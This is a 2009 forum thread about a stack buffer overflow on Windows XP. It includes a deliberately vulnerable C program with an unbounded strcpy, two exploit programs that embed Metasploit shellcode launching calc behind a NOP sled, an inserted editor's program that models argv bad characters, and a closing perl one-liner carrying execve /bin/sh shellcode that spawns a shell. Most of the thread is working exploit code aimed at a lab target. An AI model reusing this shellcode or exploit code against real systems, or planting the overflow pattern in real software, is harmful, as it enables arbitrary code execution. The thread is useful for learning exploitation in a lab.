Government Security
Network Security Resources

Overwriting EIP question

Tags: windows, buffer overflow, bug, exploit, virus, c++, shell, antivirus

4 replies to this topic

#1 cJenna86 (Private, Members, 2 posts)

Posted 15 January 2009 - 02:24 PM

Hey guys, noob here. I've been trying to understand how a buffer overflow attack works, but so far no success when it comes to creating my own exploit. My problem is: I'm sure the shellcode works, and I can overwrite the EIP and trick my vuln.exe into executing its own function (which should never be reached normally), but when I point the EIP at my shellcode, the address just changes...

Here's what I'm running/using:
- Windows XP SP3
- Data Execution Prevention is turned off
- Dev C++
- OllyDbg debugger
- shellcode from metasploit
- no antivirus

The vuln code looks like this (vuln.exe):

[codebox]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Never reached on the normal path; only an overwritten return address gets here. */
int test()
{
    printf("\nWhoa, you changed the EIP!");
    return 0;
}

int main(int argc, char *arg[])
{
    char buffer[300];
    int pass = 0;
    if (argc == 1)
    {
        printf("At least give me something, will ya?\n");
    }
    else
    {
        strcpy(buffer, arg[1]);   /* unbounded copy of argv[1]: the intended overflow */
    }

    if (pass == 1)
    { test(); }

    system("PAUSE");

    return 0;
}
[/codebox]

The exploit:

[codebox]
#include <stdlib.h>
#include <stdio.h>
#include <Windows.h>
#include <string.h>

int main()
{
    //cmd: calc size=160
    unsigned char shellcode[] = "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
    "\x2f\xcd\x3c\x83\xeb\xfc\xe2\xf4\xa2\xc7\x89\x3c\x5e\x2f\x46\x79"
    "\x62\xa4\xb1\x39\x26\x2e\x22\xb7\x11\x37\x46\x63\x7e\x2e\x26\x75"
    "\xd5\x1b\x46\x3d\xb0\x1e\x0d\xa5\xf2\xab\x0d\x48\x59\xee\x07\x31"
    "\x5f\xed\x26\xc8\x65\x7b\xe9\x38\x2b\xca\x46\x63\x7a\x2e\x26\x5a"
    "\xd5\x23\x86\xb7\x01\x33\xcc\xd7\xd5\x33\x46\x3d\xb5\xa6\x91\x18"
    "\x5a\xec\xfc\xfc\x3a\xa4\x8d\x0c\xdb\xef\xb5\x30\xd5\x6f\xc1\xb7"
    "\x2e\x33\x60\xb7\x36\x27\x26\x35\xd5\xaf\x7d\x3c\x5e\x2f\x46\x54"
    "\x62\x70\xfc\xca\x3e\x79\x44\xc4\xdd\xef\xb6\x6c\x36\xdf\x47\x38"
    "\x01\x47\x55\xc2\xd4\x21\x9a\xc3\xb9\x4c\xac\x50\x3d\x2f\xcd\x3c";

    // Filler in front of the shellcode. 0x41 ('A') is "inc ecx" on x86, so landing anywhere in it is harmless.
    char nop[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

    // Choose an EIP and test it out yourself (little-endian byte order; the trailing \x00 ends the string)
    char eip[] = "\x68\x13\x40\x00";   // function test() - the one that works
    //char eip[] = "\x38\xfd\x22\x00"; // shellcode address
    //char eip[] = "\x10\xFD\x22\x00"; // some address within the NOP block

    // +1 for the terminating NUL; start with an empty string so strcat has something valid to append to
    char buffer[strlen((char *)shellcode) + strlen(nop) + strlen(eip) + 1];
    buffer[0] = '\0';
    strcat(buffer, nop);
    strcat(buffer, (char *)shellcode);
    strcat(buffer, eip);

    // The whole buffer is handed to vuln.exe as its command-line parameter
    ShellExecute(0, "open", "C:\\vuln.exe", buffer, 0, SW_SHOW);
    printf("\n");
    system("pause");
    return 0;
}
[/codebox]

The address for test(), \x68\x13\x40\x00, works. But when I try \x10\xFD\x22\x00, the debugger gives me something like this: 0000FD10. As you can see, \x22 becomes \x00...? How can I get my exploit to work?

Computer gurus, please educate me...

-Jenna

#2 KOrUPt (Private First Class, Sergeant Major, 64 posts)

Posted 16 January 2009 - 04:15 AM

I haven't tested this but it may help :).

[codebox]
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define sledsize 155    // NOP bytes in front of the shellcode; adjust to the offset you measured
#define shellsize 160

//cmd: calc size = 160
unsigned char shellcode[] =
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
"\x2f\xcd\x3c\x83\xeb\xfc\xe2\xf4\xa2\xc7\x89\x3c\x5e\x2f\x46\x79"
"\x62\xa4\xb1\x39\x26\x2e\x22\xb7\x11\x37\x46\x63\x7e\x2e\x26\x75"
"\xd5\x1b\x46\x3d\xb0\x1e\x0d\xa5\xf2\xab\x0d\x48\x59\xee\x07\x31"
"\x5f\xed\x26\xc8\x65\x7b\xe9\x38\x2b\xca\x46\x63\x7a\x2e\x26\x5a"
"\xd5\x23\x86\xb7\x01\x33\xcc\xd7\xd5\x33\x46\x3d\xb5\xa6\x91\x18"
"\x5a\xec\xfc\xfc\x3a\xa4\x8d\x0c\xdb\xef\xb5\x30\xd5\x6f\xc1\xb7"
"\x2e\x33\x60\xb7\x36\x27\x26\x35\xd5\xaf\x7d\x3c\x5e\x2f\x46\x54"
"\x62\x70\xfc\xca\x3e\x79\x44\xc4\xdd\xef\xb6\x6c\x36\xdf\x47\x38"
"\x01\x47\x55\xc2\xd4\x21\x9a\xc3\xb9\x4c\xac\x50\x3d\x2f\xcd\x3c";

int main(void)
{
    unsigned char eip[5] = "\xEF\xBE\xAD\xDE"; // placeholder: put the address of the test function here, little-endian
    unsigned char *buffer = (unsigned char *)malloc(shellsize + sledsize + 8);
    if(buffer){
        memset(buffer, 0x90, shellsize + sledsize + 8);      // fill everything with NOPs
        memcpy(buffer + sledsize, shellcode, shellsize);     // shellcode right after the sled
        memcpy(buffer + sledsize + shellsize, eip, 4);       // return address right after the shellcode
        buffer[sledsize + shellsize + 4] = 0;                // terminate directly after the 4 address bytes
        ShellExecute(0, "open", "C:\\vuln.exe", (char *)buffer, 0, SW_SHOW);
        free(buffer);
        printf("Done");
    }else printf("Out of memory");

    return 0;
}
[/codebox]
I'm surprised your above code even compiled, given how you were working out the size of a stack-based variable.

Hopefully the above code helps.

KOrUPt.
Coder and Reverse Engineer. My blog.

#3 cJenna86 (Private, Members, 2 posts)

Posted 16 January 2009 - 05:37 PM

Hey KOrUPt, thanks for the reply and the code. But the exploit results pretty much stay the same, and I'm still stuck...

At first I compiled your code, but I only got an error saying "offset: 0090dead". So I adjusted sledsize to 157, changed the EIP to the one I have, and then the code achieved the exact same result as mine: the test() function executed. At least this part is good to know...

But then again, using your code, except with a different EIP this time pointing to my shellcode (0022ff08 in my case), I got an error "Offset: 0000ff08". This is exactly what happened to my exploit, the \x22 got replaced... why is that?

-Jenna

#4 webdevil (Retired GSO General, Sergeant Major, 1,195 posts)

Posted 17 January 2009 - 05:14 AM

It may be because of the null character 0x00 in the EIP. Try putting the shellcode in an environment variable, then try exploiting (hopefully this won't have a null char).
You generally look for a JMP ESP etc. if you face this kind of problem.
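Editor's added example, not code from the thread or from any of the posters: the byte that keeps vanishing, 0x22, is the ASCII double quote, and the Microsoft CRT's command-line parser removes unescaped quotes when it builds argv from the parameter string that ShellExecute passes on. A command-line argument is therefore a delivery channel with more bad characters than just 0x00 (space and tab split arguments, '"' is eaten). The program below models that channel: it takes the two addresses and the 317-byte offset reported in the thread, pushes a [sled][payload][address] buffer through a simplified version of the CRT's argv rules (backslash-escape handling omitted), and reproduces the observed 0x0000FD10. The four-byte payloads are constructed stand-ins for the real shellcode, and ret_addr_usable() is the check to run before picking a return address for this channel.

```c
/* argv_badchars.c: models the Windows command-line delivery channel used by
 * the thread's exploits.  Added example, not code from the thread. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bytes that do not survive a command-line argument: 0x00 ends the C string,
 * 0x20/0x09 split arguments, 0x22 is '"', which the CRT's argv parser eats. */
static int is_argv_badchar(unsigned char b)
{
    return b == 0x00 || b == 0x09 || b == 0x20 || b == 0x22;
}

/* Count bad bytes in buf[0..len) and print their offsets. */
static size_t scan_badchars(const unsigned char *buf, size_t len)
{
    size_t i, bad = 0;
    for (i = 0; i < len; i++)
        if (is_argv_badchar(buf[i])) {
            printf("  bad byte 0x%02x at offset %zu\n", buf[i], i);
            bad++;
        }
    return bad;
}

/* Three low bytes must be clean; the top byte may be 0x00 because strcpy's
 * own terminator supplies it (0x00401368 passes, 0x0022FD10 does not). */
static int ret_addr_usable(uint32_t a)
{
    unsigned char top = (unsigned char)(a >> 24);
    return !is_argv_badchar((unsigned char)a) && !is_argv_badchar((unsigned char)(a >> 8))
        && !is_argv_badchar((unsigned char)(a >> 16)) && (top == 0 || !is_argv_badchar(top));
}

/* Simplified model of how the Microsoft CRT builds argv[1] from the parameter
 * string given to ShellExecute: stop at the first NUL, drop an unescaped '"'
 * and toggle quoting, end the argument at an unquoted space or tab.
 * Backslash-escape rules are omitted.  Unused bytes of out are zeroed, which
 * also stands in for the NUL that strcpy writes after the copy in the target. */
static size_t argv_model(const unsigned char *in, unsigned char *out, size_t outcap)
{
    size_t n = 0;
    int quoted = 0;
    memset(out, 0, outcap);
    for (; *in != 0 && n < outcap; in++) {
        if (*in == '"') { quoted = !quoted; continue; }
        if (!quoted && (*in == ' ' || *in == '\t')) break;
        out[n++] = *in;
    }
    return n;
}

/* What RET loads from four little-endian bytes on the stack. */
static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Lay out [NOP sled][payload][ret_addr] as the thread's exploits do, push it
 * through the argv model and return what lands in the saved-EIP slot at
 * offset ret_off (317 in the thread's measurements). */
static uint32_t eip_after_argv(uint32_t ret_addr, size_t ret_off,
                               const unsigned char *payload, size_t plen)
{
    unsigned char in[512], out[512];
    size_t n;
    if (ret_off + 5 > sizeof in || plen > ret_off) return 0;
    n = ret_off - plen;
    memset(in, 0x90, n);                          /* NOP sled */
    memcpy(in + n, payload, plen); n += plen;     /* shellcode stand-in */
    in[n++] = (unsigned char)ret_addr;            /* address, little-endian */
    in[n++] = (unsigned char)(ret_addr >> 8);
    in[n++] = (unsigned char)(ret_addr >> 16);
    in[n++] = (unsigned char)(ret_addr >> 24);
    in[n] = 0;                                    /* string end, as in the exploit */
    argv_model(in, out, sizeof out);
    return le32(out + ret_off);
}

/* Constructed stand-in payloads (not the thread's shellcode); the second one
 * deliberately contains a '"' byte. */
static const unsigned char clean_payload[] = { 0x31, 0xc0, 0x40, 0x90 };
static const unsigned char dirty_payload[] = { 0x31, 0xc0, 0x22, 0x90 };

int main(void)
{
    const uint32_t addrs[] = { 0x00401368u, 0x0022FD10u };  /* test(), sled: from the thread */
    size_t i;
    for (i = 0; i < 2; i++)
        printf("ret 0x%08x -> EIP 0x%08x (%s)\n", addrs[i],
               eip_after_argv(addrs[i], 317, clean_payload, sizeof clean_payload),
               ret_addr_usable(addrs[i]) ? "usable" : "NOT usable");
    printf("dirty payload: %zu bad byte(s)\n", scan_badchars(dirty_payload, sizeof dirty_payload));
    printf("dirty payload shifts EIP to 0x%08x\n",
           eip_after_argv(0x00401368u, 317, dirty_payload, sizeof dirty_payload));
    return 0;
}
```

Build it with any C99 compiler (gcc -std=c99 argv_badchars.c) on whatever platform; nothing in it is Windows-specific. Two things it shows that the thread does not spell out: the test() address only works because its single 0x00 is the highest byte and is the last byte written, and a bad byte inside the shellcode does not just corrupt that one instruction but shifts every byte after it, so the return address lands in the wrong slot as well. The same scan is worth running on the real 160-byte payload before blaming the address. An environment variable, as suggested above, changes the bad-byte set to just 0x00, because the environment block is only NUL-delimited.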

#5 s3xymoon (Private First Class, Members, 57 posts)

Posted 14 June 2009 - 12:18 PM

I have overwritten that EIP, but it is somewhere in the middle of the buffer:

[codebox]
$ export TEST=`perl -e 'print "xxxxxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x30\xec\xbf\xbfAAAAAxxxxxxxxxxxxxxxxxxxxxxAAAAAAAAAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"'`
$ ./lame $TEST
$ exit
[/codebox]

I can spawn a shell but can't printf("whoa you have overwrited the eip"); ... :)
